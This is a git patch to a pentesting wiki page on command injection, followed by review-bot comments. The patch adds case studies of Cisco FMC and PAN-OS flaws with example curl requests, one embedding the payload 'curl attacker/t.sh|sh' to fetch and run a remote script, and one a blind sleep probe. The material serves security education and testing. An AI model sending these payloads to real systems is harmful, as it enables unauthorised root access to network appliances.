From ba322c1db6be6132e3d591209296fc058581cf4e Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 27 Nov 2025 08:39:30 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/pentesting-web/command-injecti... --- src/pentesting-web/command-injection.md | 40 ++++++++++++++++++++++++- 1 file changed, 39 insertions(+), 1 deletion(-) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index 7f6dc29b9e2..91f29f7078b 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -189,6 +189,43 @@ topicurl=¶m=-n topicurl=setEasyMeshAgentCfg&agentName=;id; ``` +### Recent exploitation case studies (2024-2025) + +#### CVE-2024-20424 – Cisco Secure FMC + +Cisco’s October 2024 advisory describes how insufficient validation in the FMC web UI lets any authenticated Security Analyst send crafted HTTP requests that run as root on the appliance and can even relay commands to managed Firepower Threat Defense devices. + +- Capture the `X-auth-access-token` issued after login, fuzz every JSON field exposed by the `/api/*` endpoints you can reach, and look for time-based delays or OOB hits when injecting shell metacharacters (`;`, `&&`, ``$()``). +- Because the issue only requires the read-only Security Analyst role, low-priv credential theft (password spraying, API key reuse, IDOR) is enough to reach a root shell. +- Successful exploitation lets you push the same malicious command set to downstream FTD sensors, so compromise of the manager often implies compromise of the fleet unless job queues are purged. + +Example test once you control a session token and suspect a vulnerable endpoint: + +``` +curl -sk -X POST https:/// \ + -H "X-auth-access-token: $TOKEN" \ + -H "Content-Type: application/json" \ + -d '{"name":"backup;curl attacker/t.sh|sh","type":"SystemTask"}' +``` + +Swap `` for any job/diagnostic path that reflects your user input in CLI wrappers and watch for delayed responses, DNS callbacks, or files written under `/var/sf/`. + +#### CVE-2024-3400 – PAN-OS GlobalProtect Gateway + +Alert Logic tracked CVE-2024-3400 as a zero-day in April 2024 that let unauthenticated attackers gain root on GlobalProtect gateways running PAN-OS 10.2.x < 10.2.9-h1, 11.0.x < 11.0.4-h1, or 11.1.x < 11.1.2-h3 before Palo Alto shipped hotfixes. + +- Target appliances that expose both GlobalProtect gateway and device telemetry; whenever telemetry is enabled, arbitrary files dropped under `/opt/panlogs/tmp/device_telemetry/` will be processed with root privileges. 
+- Because exploitation is unauthenticated and network-facing, add these endpoints to unauthenticated fuzzing corpora and look for parameters that are piped into shell commands (e.g., HIP report fields, telemetry IDs) by chaining `;sleep 5` or DNS callbacks. + +Minimal unauthenticated probe to confirm command execution via time-based payloads: + +``` +curl -sk -X POST https:/// \ + --data-urlencode "telemetry_token=$(printf 'blind;sleep 6;#')" +``` + +Monitor response times plus outbound DNS/HTTP to confirm the payload fired without needing response data. Treat success as evidence that the management-plane user `root` executed the payload and immediately collect device telemetry bundles for further persistence hunting. + ## Brute-Force Detection List 
@@ -199,12 +236,13 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject ## References -- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) +- [Cisco Secure Firewall Management Center – CVE-2024-20424 Advisory](https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-fmc-cmd-inj-v3AWDqN7.html) +- [Alert Logic – PAN-OS GlobalProtect CVE-2024-3400](https://support.alertlogic.com/hc/en-us/articles/360051675174-CVE-2024-3400-Palo-Alto-Networks-PAN-OS-Command-Injection-Vulnerability) {{#include ../banners/hacktricks-training.md}}
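Review bot: in the first hunk (`@@ -189,6 +189,43 @@`) both curl examples have lost their host and path placeholders; they read `curl -sk -X POST https:/// \` and the follow-up sentence reads "Swap `` for any job/diagnostic path", so the angle-bracket placeholders were evidently swallowed by the markdown renderer. Write them as plain uppercase placeholder words inside the backticks (for example `https://HOST/PATH`) so the rendered page shows what the reader must substitute, and tag the two bare code fences with a language. Two documentation gaps in the same hunk: the PAN-OS probe's `telemetry_token` parameter and the `/opt/panlogs/tmp/device_telemetry/` path appear without any citation, while the surrounding prose attributes only the version ranges to Alert Logic, so either cite where these details come from or mark them as unverified; and the Cisco case study names the affected role but, unlike the PAN-OS case, gives no fixed FMC release, which is the one fact a defender needs from the cited October 2024 advisory to check exposure.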
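Review bot: in the second hunk (`@@ -199,12 +236,13 @@`) the removed PayloadsAllTheThings bullet is byte-identical to the bullet kept directly below it, so this is a correct de-duplication and no reference is lost. For the two added entries, the case-study text above quotes specific fixed PAN-OS builds (10.2.9-h1, 11.0.4-h1, 11.1.2-h3) but the only reference added for CVE-2024-3400 is the Alert Logic write-up; add the primary Palo Alto Networks advisory next to it so the version data is traceable to the vendor, as the Cisco entry already is.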